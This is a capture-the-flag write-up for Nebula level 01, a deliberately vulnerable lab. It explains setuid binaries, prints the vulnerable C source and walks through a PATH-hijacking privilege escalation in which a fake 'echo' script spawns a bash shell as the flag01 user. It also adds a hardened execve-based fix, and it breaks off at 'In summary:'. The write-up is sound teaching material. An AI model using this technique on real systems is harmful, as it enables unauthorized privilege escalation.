Nebula Series - Level 01

20 Apr 2020


setuid and setgid are Unix permission bits that cause an executable to run with the privileges of its owner or group rather than those of the user who launched it. Improperly designed setuid executables can be used for privilege escalation.

Inspecting the flag01 user's home directory, we see a single executable named flag01.

We can check the permissions with

$ stat -c "%a" /home/flag01/flag01

4750

The leading 4 indicates that the setuid permission is set.

Alternatively we can run ls -l and look for an ‘s’ in the executable position of the user permissions.

$ ls -l /home/flag01/flag01

-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 /home/flag01/flag01

Here we also see that the owner is flag01.

To make things a little easier for us, we’re also provided with the source code.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

We can see that the application sets its real, effective and saved user and group IDs (setresuid and setresgid) to its effective user and group ID (geteuid and getegid), so every later action runs fully as the file owner, flag01. It then runs "echo" through system(), which hands the command line to /bin/sh, and /usr/bin/env resolves the bare name "echo" by searching PATH.

The question is, which echo? Because the binary inherits our environment, we can influence that by modifying our PATH.
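The weakness is not the privilege setup but the command execution: a bare program name resolved through an inherited PATH, via a shell. As an added example (not Nebula's code), the hardened counterpart below executes a fixed absolute path with a fixed environment and no shell; the names run_fixed and run_with_poisoned_path and the choice of /bin/echo are my own assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed environment for the child: PATH is pinned and nothing else is
 * inherited, so directories prepended to the caller's PATH are ignored. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Execute `path` directly (no shell, no PATH lookup) with a fixed argv and
 * SAFE_ENV. Returns the child's exit status, or -1 if the path is not
 * absolute, fork/waitpid fails, or the child did not exit normally. */
int run_fixed(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/')   /* a bare name would need a lookup */
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, SAFE_ENV);     /* returns only on failure */
        _exit(127);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demonstration: point the caller's PATH at a bogus directory, as the level
 * does, then show that run_fixed still runs the real /bin/echo (status 0). */
int run_with_poisoned_path(void)
{
    setenv("PATH", "/nonexistent", 1);
    char *const argv[] = { "echo", "still the real echo", NULL };
    return run_fixed("/bin/echo", argv);
}

int main(void)
{
    /* The uid/gid setup from the original would stay here unchanged; only
     * the command execution is replaced. */
    char *const argv[] = { "echo", "and now what?", NULL };
    return run_fixed("/bin/echo", argv);
}
```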

Let's create a new file named echo in our home directory (/home/level01) with the following contents:

#!/bin/bash

/bin/bash

Make sure it’s executable with

$ chmod +x /home/level01/echo

Add our home directory to the front of our PATH so that our echo is the one that gets run:

$ PATH=/home/level01:$PATH

All that’s left is to run the flag01 executable

$ /home/flag01/flag01

and we will be presented with a bash shell as the flag01 user. To complete the level we use our escalated privileges to run getflag

$ getflag

"You have successfully executed getflag on a target account"

In summary: